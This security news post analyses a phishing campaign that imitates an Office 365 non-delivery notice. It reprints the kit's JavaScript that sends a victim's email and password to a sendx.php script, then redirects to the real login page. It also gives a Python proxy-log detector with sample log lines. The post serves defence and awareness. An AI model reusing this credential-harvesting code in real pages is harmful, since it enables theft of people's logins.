New Phishing Attack Targets Office 365 Users

Phishing scams continue to plague inboxes around the world, and this week a new one was discovered. The new campaign pretends to be a non-delivery notification from Office 365 and encourages users to enter their login details into a page whose purpose is to steal usernames and passwords.
ISC Handler Xavier Mertens discovered the phishing scam and released its details on Thursday 13 December. The email, masquerading as Microsoft, states “Microsoft found Several Undelivered Messages”, telling the user that their message couldn’t be delivered. It then includes a “How to Fix it” section which states:
“if you’re using Outlook, open this non-delivery report message and click Send Again.”
When the victim clicks the “Send Again” link in the phishing email, they are routed to a phishing site that masquerades as the Office 365 login screen. The site also auto-populates the email address field with the victim’s email address, which adds to the legitimacy of the page. The user is encouraged to enter their password to resend the emails. When the user does enter a password, a JavaScript function called sendmails() sends the login details to the kit’s sendx.php script:
    function sendmails() {
        // Read the pre-filled address and the password the victim typed
        var em = $('#testx').val();
        var ps = $('#pass').val();
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                var response = JSON.parse(this.responseText);
                if (response.msg == "donesend") {
                    // Credentials stored: hide the form, show a "thanks" message,
                    // then send the victim to the real Office 365 login after 5 seconds
                    $(".login_form").hide();
                    $(".thanks").show();
                    setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';", 5000);
                } else {
                    // Otherwise show a fake "incorrect password" error
                    $("#warning").empty();
                    $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
                }
            }
        };
        // The credentials leave the page as a plain GET query string to the kit's sendx.php
        xhttp.open("GET", "sendx.php?user=" + em + "&pass=" + ps, true);
        xhttp.send();
    }
The script then redirects the user to the legitimate Office 365 login screen.
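As an added illustration (not code from the original report), the following Python checks web-proxy logs for the behaviour described above: a password travelling in a GET query string, followed within seconds by the same client being redirected to the real Office 365 login, which is what the kit's setTimeout produces. The log format, hostnames and sample lines are constructed assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (not from the original report); format:
# "<timestamp> <client_ip> <method> <url> <status>"
SAMPLE_LOG = """\
2018-12-13T09:12:01Z 10.0.0.21 GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=abc 200
2018-12-13T09:13:44Z 10.0.0.21 GET https://example-phish.test/owa/sendx.php?user=alice%40corp.example&pass=Winter2018%21 200
2018-12-13T09:13:49Z 10.0.0.21 GET https://outlook.office365.com/owa/?realm 302
2018-12-13T09:20:07Z 10.0.0.35 GET https://intranet.corp.example/search?user=bob&q=pass 200
"""

SECRET_KEYS = {"pass", "password", "pwd", "passwd"}  # query keys that should never carry a secret
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "url": url, "status": int(status)}

def find_credential_leaks(log_text, redirect_window=10):
    """Flag GET requests whose query string carries a password parameter.
    Each hit records the client, the receiving host, the leaked user name, and whether
    the same client was sent on to the real OWA within `redirect_window` seconds."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    hits = []
    for i, rec in enumerate(records):
        parts = urlsplit(rec["url"])
        qs = parse_qs(parts.query)
        if rec["method"] != "GET" or not (SECRET_KEYS & {k.lower() for k in qs}):
            continue
        followed = any(
            later["client"] == rec["client"]
            and urlsplit(later["url"]).hostname == "outlook.office365.com"
            and 0 <= (later["ts"] - rec["ts"]).total_seconds() <= redirect_window
            for later in records[i + 1:]
        )
        hits.append({"client": rec["client"], "host": parts.hostname,
                     "user": qs.get("user", [""])[0], "redirected_to_owa": followed})
    return hits

if __name__ == "__main__":
    for hit in find_credential_leaks(SAMPLE_LOG):
        print(hit)
```

A hit with redirected_to_owa set is a strong signal that the user completed the kit's flow; the leaked user field tells the response team whose password to reset first.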
The website the attackers link to in their email makes a convincing attempt to mirror the legitimate Office 365 website. Phishing campaigns like these are becoming increasingly sophisticated, and it is increasingly difficult for the average computer user to tell the difference, so many people fall victim and hand over their credentials. We encourage users to check the URL and not proceed if anything looks suspicious. Better still, users should go directly to the correct URL rather than following the link provided in an email.